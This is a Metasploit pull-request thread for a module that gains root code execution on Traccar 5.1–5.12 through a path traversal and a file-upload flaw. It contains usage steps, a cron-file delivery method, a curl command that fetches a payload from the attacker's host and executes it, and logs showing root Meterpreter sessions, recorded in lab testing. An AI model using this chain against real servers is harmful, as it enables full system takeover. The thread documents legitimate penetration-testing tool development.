Traccar 5 RCE (CVE-2024-31214 & CVE-2024-24809) Module

[h4x-x0r]

This is a new module which exploits two vulnerabilities in Traccar v5.1 - v5.12 to obtain remote code execution: A path traversal vulnerability (CVE-2024-24809) and an unrestricted file upload vulnerability (CVE-2024-31214). By default, the application allows self-registration, enabling any user to register an account and exploit the issues. Moreover, the application runs by default with root privileges, potentially resulting in a complete system compromise.
This module, which should work on any Red Hat-based Linux system, exploits these issues by adding a new cronjob file that executes the specified payload.

Verification Steps

1. Download the application from the vendor.
2. Deploy it by following the vendor's installation guide.
3. Start msfconsole
4. use exploit/linux/http/traccar_rce_upload
5. set RHOSTS <IP>
6. set LHOST<IP>
7. exploit

A new crontab file should have been written to /etc/cron.d/ that executes the specified fetch command to get you a meterpreter session in the context of root.

msf6 exploit(linux/http/traccar_rce_upload) > exploit 

[*] Started reverse TCP handler on 192.168.217.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Registering new user...
[*] Authenticating...
[*] Adding new device...
[*] Uploading crontab file...
[*] Cronjob successfully written - waiting for execution...
[*] Sending stage (3045380 bytes) to 192.168.217.138
[*] Meterpreter session 1 opened (192.168.217.128:4444 -> 192.168.217.138:58196) at 2024-08-25 17:03:02 -0400
[*] Exploit finished, check thy shell.

meterpreter > sysinfo 
Computer     : localhost.localdomain
OS           : Red Hat 9.4 (Linux 5.14.0-427.13.1.el9_4.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

meterpreter > getuid 
Server username: root

Successfully tested on

• Traccar v5.12 on Rocky Linux 9.4
• Traccar v5.11 on Rocky Linux 9.4

Notes
At the end, I've added a one minute sleep command, as otherwise the handler might terminate before the cronjob got executed and meterpreter session established.

    print_status('Cronjob successfully written - waiting for execution...')
    sleep(60)

Not sure if there is a proper MSF way to handle this except for running a handler as a standalone instance?

[jheysel-r7]

Thanks for the great module @h4x-x0r. I followed the setup and verification steps provided and the module worked great. I left a couple minor suggestions. Let me know if you have any questions!

Testing Traccar v5.12 on Rocky 9.4

msf6 exploit(linux/http/traccar_rce_upload) > run

[*] Command to run on remote host: curl -so ./fzxfIziqe http://172.16.199.1:8080/Hn-8qIL46e0vZdQpIHPToA; chmod +x ./fzxfIziqe; ./fzxfIziqe &
[*] Fetch handler listening on 172.16.199.1:8080
[*] HTTP server started
[*] Adding resource /Hn-8qIL46e0vZdQpIHPToA
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Version retrieved: 5.12
[+] The target appears to be vulnerable.
[*] Registering new user...
[*] Authenticating...
[*] JSESSIONID: node0zr2il1bs4k2hjpc2gkowvsf59.node0
[*] Adding new device...
[*] Uploading crontab file...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 172.16.199.130
[*] Cronjob successfully written - please wait 60 seconds for execution...
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.130:45060) at 2024-08-28 15:43:13 -0400

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Red Hat 9.4 (Linux 5.14.0-427.31.1.el9_4.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

[h4x-x0r]

Thanks for the great module @h4x-x0r. I followed the setup and verification steps provided and the module worked great. I left a couple minor suggestions. Let me know if you have any questions!

Thank you for reviewing my PR and providing feedback. I'll work through your comments and update the code accordingly.

[h4x-x0r]

I've updated the code based on the feedback received.

1. Case when a new user is registered and the e-mail doesn't exist yet:

msf6 > use exploit/linux/http/traccar_rce_upload 
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/traccar_rce_upload) > set RHOSTS 192.168.217.138
RHOSTS => 192.168.217.138
msf6 exploit(linux/http/traccar_rce_upload) > set LHOST 192.168.217.128
LHOST => 192.168.217.128
msf6 exploit(linux/http/traccar_rce_upload) > exploit 

[*] Started reverse TCP handler on 192.168.217.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Registering new user...
[*] Authenticating...
[*] Adding new device...
[*] Uploading crontab file...
[*] Cronjob successfully written - waiting for execution...
[*] Sending stage (3045380 bytes) to 192.168.217.138
[+] Deleted /etc/cron.d/0939e785b3601e16bfb36916"
[*] Meterpreter session 1 opened (192.168.217.128:4444 -> 192.168.217.138:35904) at 2024-09-12 09:28:44 -0400

2. Case when the provided e-mail already exists, and the correct password is provided:

msf6 exploit(linux/http/traccar_rce_upload) > exploit 

[*] Started reverse TCP handler on 192.168.217.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Registering new user...
[*] The same E-mail already exists on the system, trying to authenticate with existing password...
[*] Adding new device...
[*] Uploading crontab file...
[*] Cronjob successfully written - waiting for execution...
[*] Sending stage (3045380 bytes) to 192.168.217.138
[*] Sending stage (3045380 bytes) to 192.168.217.138
[+] Deleted /etc/cron.d/7eed2c15b23feca694f0f0d8"
[*] Meterpreter session 3 opened (192.168.217.128:4444 -> 192.168.217.138:51582) at 2024-09-12 09:29:26 -0400

3. Case when the provided e-mail already exists, but a wrong password is provided:

msf6 exploit(linux/http/traccar_rce_upload) > exploit 

[*] Started reverse TCP handler on 192.168.217.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Registering new user...
[*] The same E-mail already exists on the system, trying to authenticate with existing password...
[*] Provide the correct password for the existing E-Mail address, or provide a new E-Mail address.
[-] Exploit aborted due to failure: unexpected-reply: HTTP/1.1 400 Bad Request
Date: Thu, 12 Sep 2024 13:29:59 GMT
Set-Cookie: JSESSIONID=node08xm8vg6a7bgyi387x4y1rmok449.node0; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/json
access-control-allow-headers: origin, content-type, accept, authorization
access-control-allow-credentials: true
access-control-allow-methods: GET, POST, PUT, DELETE, OPTIONS
access-control-allow-origin: *
Content-Length: 256
Server: Jetty(11.0.19)

Cannot invoke "org.traccar.api.security.LoginResult.getUser()" because the return value of "org.traccar.api.security.LoginService.login(String, String, java.lang.Integer)" is null - NullPointerException (SessionResource:121 < ... < OverrideFilter:49 < ...)
[*] Exploit completed, but no session was created.

[jheysel-r7]

Hey @h4x-x0r, thanks for address all those comments. I've retested and everything is working as expect, much appreciated. Landing now.

Edit: Removing unnecessary jsessionid parsing then landing.

Testing

msf6 exploit(linux/http/traccar_rce_upload) > run

[*] Started reverse TCP handler on 192.168.1.67:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Registering new user...
[*] Authenticating...
[*] Adding new device...
[*] Uploading crontab file...
[*] Cronjob successfully written - waiting for execution...
[*] Sending stage (3045380 bytes) to 192.168.1.67
[+] Deleted /etc/cron.d/40576ea71c74fe5cdc3a0e9a"
[*] Meterpreter session 1 opened (192.168.1.67:4444 -> 192.168.1.67:51643) at 2024-09-23 14:51:01 -0700

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Red Hat 9.4 (Linux 5.14.0-427.31.1.el9_4.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

[jheysel-r7]

Release Notes

This module exploits two vulnerabilities in Traccar v5.1 - v5.12 to obtain remote code execution: A path traversal vulnerability CVE-2024-24809 and an unrestricted file upload vulnerability CVE-2024-31214.

[h4x-x0r]

@jheysel-r7 Thank you!